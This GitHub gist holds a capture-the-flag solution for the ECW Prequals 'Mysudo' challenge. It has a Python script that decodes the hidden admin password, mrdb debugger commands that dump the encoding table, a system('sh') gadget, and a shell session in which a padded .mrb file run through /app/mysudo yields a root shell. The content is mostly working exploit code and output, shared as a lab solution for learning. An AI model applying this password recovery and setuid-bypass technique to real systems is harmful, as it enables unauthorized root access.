It was easier, I just had to trigger an error to avoid the setuid that drops privileges.
Last active
October 22, 2019 12:33
-
-
Save LoadLow/e37685d154a0156b8d051c171cfc1eac to your computer and use it in GitHub Desktop.
ECW Prequals - Challenge "Mysudo"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| system("sh") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| src = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r" | |
| dst = "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97" | |
| password_dst = [ | |
| 122, -111, -38, -11, -45, -11, -43, 90, 104, 36, 8, 91, 91, 91, 91 | |
| ] | |
| password_src = "" | |
| for i in range(0, len(password_dst)): | |
| password_src += chr((password_dst[i] & 0xff) ^ 0xFE) | |
| password_revd = "" | |
| for i in range(0, len(password_src)): | |
| password_revd += src[dst.find(password_src[i])] | |
| print("That's probably not the solution but ... " + str(password_revd)) # ADMsystem42$$$$ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cp /app/main.mrb /tmp | |
| mrdb -d main.mrb | |
| r | |
| e encode("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r") | |
| ret [0] "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| vi gadget.rb | |
| mrbc gadget.rb | |
| echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ | |
| >> gadget.mrb | |
| /app/mysudo gadget | |
| Password: *************** | |
| /tmp # id | |
| uid=0(root) gid=0(root) groups=0(root) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment